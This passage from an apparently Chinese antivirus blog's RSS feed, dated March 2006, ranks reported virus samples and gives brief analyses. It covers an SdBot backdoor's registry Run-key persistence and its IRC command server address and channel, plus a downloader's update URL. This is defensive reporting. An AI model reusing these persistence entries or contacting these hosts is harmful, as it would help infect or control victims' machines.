118px"><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="562"><div><font face="Arial"><strong>技术分析</strong></font></div><span><span id="L025D08200E2E2332" title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 540px" width="540" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 16px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><span><table title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border="1"><colgroup><col style="WIDTH: 223px" width="223" /><col style="WIDTH: 313px" width="313" /></colgroup><tbody><tr id="L025D08A0108B2BD5"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="223"><span><span id="L025D08E012E834B8" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">313.exe</span></span></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="313"><span><span id="L025D092015453DDB" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor/SdBot.cxe</span></span></td></tr></tbody></table></span><div></div></td></tr><tr style="MIN-HEIGHT: 17px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><div><span><span id="L025D09A017A2477E" title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><div>1、病毒运行后，将创建下列文件：<br />%SystemDir%\313.exe, 82709字节<br />在注册表中添加下列启动项：<br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />&amp;quot;Microsoft System&amp;quot; = 313.exe<br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]<br />&amp;quot;Microsoft System&amp;quot; = 313.exe<br />[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />&amp;quot;Microsoft System&amp;quot; = 313.exe<br />[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]<br />&amp;quot;Microsoft System&amp;quot; = 313.exe<br />这样，在Windows启动时，病毒就可以自动执行。</div><div>&amp;nbsp;</div><div>2、利用多种系统漏洞进行传播。会扫描局域网内存在漏洞的计算机，发送大量数据包，可以造成局域网拥堵甚至瘫痪。<br />&amp;nbsp;<br />3、连接irc服务器221.2.51.204:65146，接收黑客命令。<br />botnet:<br />221.2.51.204:65146 <br />#google g00gle</div><div>&amp;nbsp;</div></span></span></div></td></tr></tbody></table></span><div></div></span><div></div><span id="L0301804028D53F53" title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 540px" width="540" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 16px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><span><table title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border="1"><colgroup><col style="WIDTH: 223px" width="223" /><col style="WIDTH: 313px" width="313" /></colgroup><tbody><tr id="L030180C02BD6C016"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="223"><span><span id="L030181002ED84119" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">iplus.exe</span></span></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="313"><span><span id="L0301814031D9C25C" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanDownloader</span></span></td></tr></tbody></table></span><div></div></td></tr><tr style="MIN-HEIGHT: 17px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><div><span><span id="L030181C034DB441F" title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><div>一个下载器，运行后首先从<a href="http://www.yeacool.net/update/update.txt">http://www.yeacool.net/update/update.txt</a>得到要下载的程序列表，然后下载并运行列表上的网络程序。会安装播霸、Vika阅读器、快搜IE插件等。</div><div>&amp;nbsp;</div></span></span></div></td></tr></tbody></table></span><div></div></span><div></div></span><div></div></td></tr></tbody></table></span>]]></description> 
<dc:subject><![CDATA[病毒反病毒]]></dc:subject> 
<dc:creator><![CDATA[daishuo]]></dc:creator> 
<dc:date>2006-03-24T12:34:54Z</dc:date> 
</item> 
<item rdf:about="http://daishuo.bokee.com/4726091.html"> 
<title><![CDATA[昨日病毒(2006.03.20)]]></title> 
<link>http://daishuo.bokee.com/4726091.html</link> 
<description><![CDATA[<span>&amp;nbsp;<table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 562px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 562px" width="562" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 41px"><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #99ccff" width="562"><div><strong><font face="Arial">昨日病毒</font></strong></div></td></tr><tr style="MIN-HEIGHT: 31px"><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="562"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 295px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 146px" width="146" /><col style="WIDTH: 149px" width="149" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="146"><div><font face="Arial"><strong>统计时段</strong></font></div></td><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="149"><div><font face="宋体"><div title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline; FONT-SIZE: x-small; MARGIN: 1px 1px 2px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; BACKGROUND-COLOR: window"><span id="L025D04E004BA05E6" style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; OVERFLOW: hidden; WIDTH: 100%; MARGIN-RIGHT: 22px; PADDING-TOP: 0px; WHITE-SPACE: nowrap; HEIGHT: 100%">2006-3-20</span><span style="MARGIN-LEFT: -21px; WIDTH: 20px; HEIGHT: 18px"></span></div></font></div></td></tr></tbody></table></span><div></div></td></tr><tr><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="562"><span><table title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 555px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border="1"><colgroup><col style="WIDTH: 555px" width="555" /></colgroup><tbody><tr><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><div><strong><font face="Arial">病毒样本上报数排行</font></strong></div><div><strong><font face="Arial"></font></strong>&amp;nbsp;</div><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 394px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 165px" width="165" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 22px"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="229"><div align="center"><font face="Arial">样本文件名</font></div></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="165"><div align="center"><font face="Arial">上报次数</font></div></td></tr></tbody></table></span><div></div></td></tr></tbody><tbody><tr id="L025D06A007170C89"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 166px" width="166" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L025D0720097413AC" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">bmnss.exe</span></span></div></font></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="166"><div><font face="宋体"><span><span id="L025D07600BD11B0F" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">217</span></span></font></div></td></tr></tbody></table></span><div></div></td></tr><tr id="L025DC0401C5D0CC4"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 166px" width="166" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L025DC0C01EBACD87" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mousepad4.exe</span></span></div></font></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="166"><div><font face="宋体"><span><span id="L025DC10021188E8A" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">151</span></span></font></div></td></tr></tbody></table></span><div></div></td></tr><tr id="L030060402418EECD"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 166px" width="166" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L030060C027194F90" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">newname4.exe</span></span></div></font></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="166"><div><font face="宋体"><span><span id="L030061002A19B093" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">150</span></span></font></div></td></tr></tbody></table></span><div></div></td></tr><tr id="L0300A0402D1A50D6"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 166px" width="166" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L0300A0C0301AF199" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">keyboard4.exe</span></span></div></font></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="166"><div><font face="宋体"><span><span id="L0300A100331B929C" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">108</span></span></font></div></td></tr></tbody></table></span><div></div></td></tr></tbody></table></span><div></div></td></tr><tr style="MIN-HEIGHT: 118px"><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="562"><div><font face="Arial"><strong>技术分析</strong></font></div><span><span id="L025D08200E2E2332" title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 540px" width="540" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 16px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><span><table title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border="1"><colgroup><col style="WIDTH: 223px" width="223" /><col style="WIDTH: 313px" width="313" /></colgroup><tbody><tr id="L025D08A0108B2BD5"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="223"><span><span id="L025D08E012E834B8" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">bmnss.exe</span></span></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="313"><span><span id="L025D092015453DDB" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor/Agobot</span></span></td></tr></tbody></table></span><div></div></td></tr><tr style="MIN-HEIGHT: 17px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><div><span><span id="L025D09A017A2477E" title="" 